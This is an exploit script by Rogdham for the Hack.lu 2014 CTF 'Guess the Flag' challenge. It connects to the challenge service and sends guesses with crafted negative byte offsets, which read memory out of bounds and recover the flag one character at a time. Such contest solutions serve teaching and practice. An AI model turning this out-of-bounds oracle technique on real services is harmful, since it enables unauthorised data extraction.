#!/usr/bin/env python2


'''
Hack.lu 2014
Public CTF
Guess the Flag challenge

Exploit by Rogdham
2014.10.23
See http://r.rogdham.net/23
Licence: CC0

    This program is free software. It comes without any warranty, to the extent
    permitted by applicable law. You can redistribute it and/or modify it under
    the terms of the CC0 1.0 Universal Licence (French).
    See CC0 https://creativecommons.org/publicdomain/zero/1.0/deed.fr for more
    details.

Tested with Python 2.7.
'''


from struct import pack
import string
import socket
import sys


class Exploit(object):

    def __init__(self, ip, port):
        self.s = socket.socket()
        self.s.connect((ip, port))

    def read(self, end='\n'):
        l = ''
        while not l.endswith(end):
            l += self.s.recv(1)
        return l

    def send(self, v):
        self.s.sendall(v)

    def is_valid(self, token):
        self.read('guess> ')
        self.send('%s\n' % token)
        return self.read().startswith('Yaaaay!')

    def run(self):
        diff = 0x7fffffffce30 - 0x7fffffffcdf0
        flag = '666c61677b'  # already know first 6 bytes
        pseudoflag = ''.join(
            '0' + pack('<b', -diff + i)
            for i in xrange(5, 50)
        )
        while pseudoflag:
            print flag.decode('hex')
            pseudoflag = pseudoflag[2:]
            for c in string.hexdigits.lower() + '}':
                c = c.encode('hex')
                if self.is_valid(flag + c + pseudoflag):
                    flag += c
                    break
            else:
                print 'Oops, something went wrong :-/'
                sys.exit(1)
        print flag.decode('hex')


if __name__ == '__main__':
    #Exploit('wildwildweb.fluxfingers.net', 1412).run()
    Exploit('localhost', 1412).run()
